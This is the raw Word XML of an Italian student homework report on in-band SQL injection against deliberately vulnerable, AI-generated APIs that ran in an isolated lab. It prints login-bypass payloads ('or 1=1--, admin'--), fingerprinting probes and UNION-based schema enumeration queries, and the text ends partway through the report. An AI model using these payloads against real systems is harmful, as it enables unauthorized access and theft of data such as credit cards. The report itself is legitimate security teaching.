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B065" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sicurezza: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E98261" w14:textId="77777777" w:rsidR="002D7BC6" w:rsidRPr="002D7BC6" w:rsidRDefault="002D7BC6" w:rsidP="002D7BC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D7BC6" w14:paraId="014ADA1E" w14:textId="77777777" w:rsidTr="002D7BC6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A345224" w14:textId="1E809970" w:rsidR="002D7BC6" w:rsidRPr="002D7BC6" w:rsidRDefault="002D7BC6" w:rsidP="002D7BC6">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D7BC6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Andrea Capitanelli</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="643FDE95" w14:textId="334B7EA2" w:rsidR="002D7BC6" w:rsidRPr="002D7BC6" w:rsidRDefault="00477548" w:rsidP="002D7BC6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00477548">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2060120</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D7BC6" w14:paraId="3616DB93" w14:textId="77777777" w:rsidTr="002D7BC6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F9E582A" w14:textId="0836EDFC" w:rsidR="002D7BC6" w:rsidRPr="002D7BC6" w:rsidRDefault="002D7BC6" w:rsidP="002D7BC6">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D7BC6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Stefano Mostarda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68A8FDA0" w14:textId="35BE00E6" w:rsidR="002D7BC6" w:rsidRPr="002D7BC6" w:rsidRDefault="002D7BC6" w:rsidP="002D7BC6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D7BC6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2129683</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F4BED98" w14:textId="77777777" w:rsidR="002D7BC6" w:rsidRPr="002D7BC6" w:rsidRDefault="002D7BC6" w:rsidP="002D7BC6"/>
    <w:p w14:paraId="1458C2F3" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="006766AD"/>
    <w:p w14:paraId="2C3B96DB" w14:textId="3B221B64" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Questo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>homework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dimostra come utilizzando attacchi di SQL injection di tipo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inband</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, si </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poss</w:t>
      </w:r>
      <w:r w:rsidR="00B74396">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>no</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> eseguire con successo attacchi volti a violare le caratteristiche CIA di un database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05171A57" w14:textId="6EA8F24B" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">L’applicazione è composta da due api REST che offrono le seguenti funzionalità: Login e lista di carte di credito. Queste api sono replicate in quanto una coppia usa SQL Server come database e l’altra usa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Per rendere l’attacco più “realistico”, il codice dell’applicazione e la struttura del database sono stati creati sfruttando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gemini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e durante il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prompting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, le istruzioni sono state quelle di generare codice che fosse soggetto a SQL injection, ma che cercasse di </w:t>
      </w:r>
      <w:r w:rsidR="00B74396">
        <w:t xml:space="preserve">non </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rendere la vita semplice a un eventuale attaccante. Il codice generato è stato preso da una terza persona e messo su una macchina nella rete interna senza </w:t>
      </w:r>
      <w:r w:rsidR="0072678D">
        <w:t>possibilità di accesso</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0072678D">
        <w:t xml:space="preserve"> I database non era</w:t>
      </w:r>
      <w:r w:rsidR="00F038FA">
        <w:t>no</w:t>
      </w:r>
      <w:r w:rsidR="0072678D">
        <w:t xml:space="preserve"> accessibil</w:t>
      </w:r>
      <w:r w:rsidR="00F038FA">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="0072678D">
        <w:t xml:space="preserve"> dall’esterno del</w:t>
      </w:r>
      <w:r w:rsidR="00F038FA">
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
      <w:r w:rsidR="0072678D">
        <w:t xml:space="preserve"> quindi non si potevano recuperare informazioni accedendovi da strumenti come SSMS o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0072678D">
        <w:t>pgAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0072678D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625A39B8" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Injection verso le API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6537F0" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Il punto di partenza per effettuare un attacco è il file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenApi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> che espone la lista delle API disponibili e dei loro input e output. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581FC1D6" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Login tramite tautologia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555C0BCD" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">La prima API è </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>users/login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> che accetta in input un payload JSON che contiene username e password e torna una stringa con il token di autenticazione oppure 404 se i parametri non corrispondono a un utente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473DA83D" w14:textId="3CBCAC83" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Poiché </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l’api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> non fornisce dati del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, ma un token di autenticazione o un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NotFound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, siamo nel campo della </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Blind injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> quindi l’unica cosa che possiamo fare è inviare comandi specifici e verificare se vanno o meno in errore o ci danno risposte sensate. In questo caso </w:t>
      </w:r>
      <w:r w:rsidR="00B52727">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> supposto che </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l’api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> validasse username e password sfruttando la seguente query.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096BC5" w14:paraId="044E473C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="236C142A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$"SELECT 1 FROM Users WHERE Username = '{Username}' AND password = '{Password}'"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A0F7035" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="00096BC5" w:rsidRDefault="006766AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D508FEC" w14:textId="3C98927C" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Se l’assunzione </w:t>
      </w:r>
      <w:r w:rsidR="000266B1">
        <w:t>fosse stata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> corretta, una tautologia avrebbe permesso di superare l’autenticazione e ottenere il primo utente restituito dalla query. Poiché </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l’api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> prende i dati in </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">POST tramite un payload JSON con username e password, </w:t>
      </w:r>
      <w:r w:rsidR="00B52727">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inviato il seguente payload.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6CA03236" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26AE3571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0444E853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"username": "'or 1=1--",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62917B70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"password": "inutile"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="023955E0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8B33888" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="006766AD"/>
    <w:p w14:paraId="6E8C8DFF" w14:textId="3804E20A" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Come risultato </w:t>
      </w:r>
      <w:r w:rsidR="00B52727">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ottenuto uno status code 200 e </w:t>
      </w:r>
      <w:r w:rsidR="00B74396">
        <w:t>un token JWT</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AB6D2F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B74396">
        <w:t xml:space="preserve">Andando ad analizzare il token, </w:t>
      </w:r>
      <w:r w:rsidR="00AB6D2F">
        <w:t xml:space="preserve">Il nome </w:t>
      </w:r>
      <w:r w:rsidR="00B74396">
        <w:t xml:space="preserve">dell’utente </w:t>
      </w:r>
      <w:r w:rsidR="00AB6D2F">
        <w:t>era</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GuestUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="005817D1">
        <w:t xml:space="preserve"> che non dava l’idea di essere un amministratore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Per ottenere un token con credenziali superiori, </w:t>
      </w:r>
      <w:r w:rsidR="00AB6D2F">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> provato lo username ‘admin’ con relative varianti: ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’, ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>superadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’, ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ e così via.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397E3EE1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2130729D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5AA9B7FE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"username": "admin'--",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C0465A3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"password": "inutile"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FBBFA4E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B3F0E96" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="006766AD"/>
    <w:p w14:paraId="7D1F69F4" w14:textId="46854BC2" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Il risultato è stato sempre un 404. A questo punto le possibilità erano due: </w:t>
      </w:r>
      <w:r w:rsidR="00B74396">
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non esiste un utente con una di quelle username, oppure la query presunta è sbagliata. </w:t>
      </w:r>
      <w:r w:rsidR="00AB6D2F">
        <w:t>Abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> quindi cambiato approccio presupponendo che la query fosse a campi invertiti, cioè che verificasse prima la password e poi la username. A questo punto però per </w:t>
      </w:r>
      <w:r w:rsidR="005817D1">
        <w:t xml:space="preserve">estrarre l’utente amministratore </w:t>
      </w:r>
      <w:r>
        <w:t>correttamente, dovev</w:t>
      </w:r>
      <w:r w:rsidR="00AB6D2F">
        <w:t>amo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> conoscere il nome del campo </w:t>
      </w:r>
      <w:r w:rsidR="005817D1">
        <w:t>con la username</w:t>
      </w:r>
      <w:r>
        <w:t>. Potev</w:t>
      </w:r>
      <w:r w:rsidR="00AB6D2F">
        <w:t>amo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> andare per tentativi, ma </w:t>
      </w:r>
      <w:r w:rsidR="00AB6D2F">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> preferito raccogliere informazioni sul database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3930B133" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Estrazione della tipologia del database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0AB93C" w14:textId="477B9805" w:rsidR="006766AD" w:rsidRDefault="00AB6D2F">
      <w:r>
        <w:t xml:space="preserve">Il primo passo nella raccolta delle informazioni è stato scoprire </w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t>la tipologia di database</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Abbiamo</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve"> sfruttato </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ancora </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00000000">
        <w:t>l’api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve"> di login iniettando un comando caratteristico del database che </w:t>
      </w:r>
      <w:r>
        <w:t>volevamo</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve"> testare.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39012D75" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6271061E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25048624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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="399AD35E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"username": "' or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isnull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(null,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1)=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1--",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03AB9126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"password": "inutile"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67EC03AB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64559F0B" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="00096BC5" w:rsidRDefault="006766AD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="43C366BA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###PostgreSQL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A48BF78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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13E62687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"username": "' or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version(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)&lt;&gt;''--",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F60CAE7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"password": "inutile"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F54F328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D39B8DE" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="006766AD"/>
    <w:p w14:paraId="2A7614E9" w14:textId="2431DEC7" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Se </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l’api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> restituisce un token, significa che </w:t>
      </w:r>
      <w:r w:rsidR="00AB6D2F">
        <w:t xml:space="preserve">abbiamo lanciato un comando corretto per quel database e quindi abbiamo </w:t>
      </w:r>
      <w:r>
        <w:t>scoperto il modello</w:t>
      </w:r>
      <w:r w:rsidR="00AB6D2F">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB6D2F">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>ltrimenti lancia</w:t>
      </w:r>
      <w:r w:rsidR="00AB6D2F">
        <w:t>mo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> un comando tipico </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>del</w:t>
      </w:r>
      <w:r w:rsidR="00B74396">
        <w:t>l’altro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> database. Sebbene questa tecnica non sia perfetta al 100% (</w:t>
      </w:r>
      <w:r w:rsidR="00B74396">
        <w:t xml:space="preserve">ad esempio </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">potrei aver definito in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PostgreSql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> una funzione personalizzata </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>isnull</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e questo mi porterebbe a pensare che il database in uso è SQL Server), è sicuramente una buona approssimazione. Una volta scoperto il tipo di database, </w:t>
      </w:r>
      <w:r w:rsidR="00AB6D2F">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sfrutta</w:t>
      </w:r>
      <w:r w:rsidR="00AB6D2F">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l’api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> della lista delle carte per ottenere informazioni sulla struttura del database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0CF6A7" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Informazioni sulla struttura del database tramite </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>piggybacked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5F2D7F" w14:textId="3497B049" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>L’api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> che torna la lista delle carte prende in input, tramite </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querystring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, una variabile di nome </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> che contiene una stringa usata come filtro per l’issuer della carta e per il numero. In output restituisce la lista delle carte associate all’utente o tutte le carte nel caso di privilegi da amministratore. Avendo un token legato all’utente, quando pass</w:t>
      </w:r>
      <w:r w:rsidR="00E41DF6">
        <w:t>iam</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o il token </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>all’api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, questa torna già le carte legate all’utente loggato. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Questa</w:t>
      </w:r>
      <w:r w:rsidR="005817D1">
        <w:t>’a</w:t>
      </w:r>
      <w:r>
        <w:t>pi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> però può essere sfruttata per tornare dati sulla struttura del database tramite </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>piggybacked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01615042" w14:textId="15642986" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Poiché </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l’api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> torna una lista di carte con i campi Number, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ExpiryDate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e Issuer </w:t>
      </w:r>
      <w:r w:rsidR="00106922">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> presupposto che la query estraesse solo questi tre campi e che fossero due stringhe e una data. Per prima cosa </w:t>
      </w:r>
      <w:r w:rsidR="00106922">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cercato di ottenere i nomi delle tabelle e relativo schema iniettando la seguente stringa.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096BC5" w14:paraId="49FD8DD9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D50B5D8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6C5CC5FB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 UNION ALL SELECT s.name, '2001-01-01', t.name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E24217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sys.tables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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B24841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sys.schemas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s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</w:p>
          <w:p w14:paraId="12EB054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--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D360F64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7DF95BAC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###PostgreSQL </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="623EC85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 UNION ALL SELECT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, '2001-01-01',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table_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="1D98E9B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information_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schema.tables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0E4A836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WHERE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NOT IN ('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information_schema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', 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pg_catalog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') </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B9F8DD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AND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table_type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'BASE TABLE'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="131123E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--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="139B5AF8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1F3788B0" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="00096BC5" w:rsidRDefault="006766AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30838D06" w14:textId="5F512A42" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Il risultato è stato un errore, quindi </w:t>
      </w:r>
      <w:r w:rsidR="00106922">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> provato tutte le </w:t>
      </w:r>
      <w:r w:rsidR="005817D1">
        <w:t>permutazioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dei campi ottenendo però sempre un errore. </w:t>
      </w:r>
      <w:r w:rsidR="00106922">
        <w:t>Abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> quindi scritto un programma che partisse dalle seguenti considerazioni: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C5E4CA" w14:textId="77777777" w:rsidR="006766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SQL Server può avere tabelle con al massimo 1024 colonne, mentre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1600;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE6E968" w14:textId="761346C3" w:rsidR="006766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Visto che estrarre solo tre colonne causa un errore, </w:t>
      </w:r>
      <w:r w:rsidR="00106922">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>probabilmente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> la query estrae un numero maggiore di colonne (per motivi interni o perché gemini ha messo qualche trappola);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38951452" w14:textId="77777777" w:rsidR="006766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Non si sa nulla sulle colonne in più che vengono estratte (nome, tipo, metadati).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3969F3" w14:textId="5FAE9A0D" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Il programma fa una cosa molto semplice: partendo da 4 e fino a 1600, </w:t>
      </w:r>
      <w:r w:rsidR="00E41DF6">
        <w:t xml:space="preserve">crea una query SQL che </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">calcola tutte le possibili permutazioni contando di estrarre i tre campi più altri il cui tipo può essere uno tra bit,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date, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>datetime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
